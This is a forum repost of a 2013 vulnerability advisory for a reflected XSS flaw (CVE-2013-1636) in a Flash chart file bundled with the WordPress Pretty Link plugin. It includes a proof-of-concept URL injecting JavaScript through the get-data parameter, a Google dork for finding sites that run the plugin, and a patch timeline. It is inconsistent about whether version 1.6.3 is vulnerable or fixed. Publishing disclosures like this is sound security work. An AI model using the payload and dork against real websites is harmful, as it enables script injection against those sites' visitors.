Praetorian503 Posted February 21, 2013 Report Posted February 21, 2013 WordPress Pretty Link plugin version 1.6.3 suffers from a cross site scripting vulnerability.# Exploit Title: Wordpress pretty-link? plugin XSS in SWF# Release Date: 20/02/13# Author: hip [Insight-Labs]# Contact: hip@insight-labs.org | Website: http://insight-labs.org# Software Link: http://downloads.wordpress.org/plugin/pretty-link.1.6.3.zip# Vendor Homepage: http://prettylinkpro.com/# Tested on: XPsp3# Affected version: 1.6.3 before# Google Dork: inurl:/wp-content/plugins/pretty-link/# REF:CVE-2013-1636-----------------------------------------------------------------------------------------------------------------------# Introduction:Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!-------------------------------------------------------------------------------------------------------------------------# XSS - Proof Of Concept:vulnerable path:/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swfvulnerabile parameter:get-dataPOC:/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()-------------------------------------------------------------------------------------------------------------------------# Patch:-- Vendor was notified on the 23/01/2013-- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug-- REF:http://wordpress.org/extend/plugins/pretty-link/changelog/-------------------------------------------------------------------------------------------------------------------------Source: PacketStorm Quote
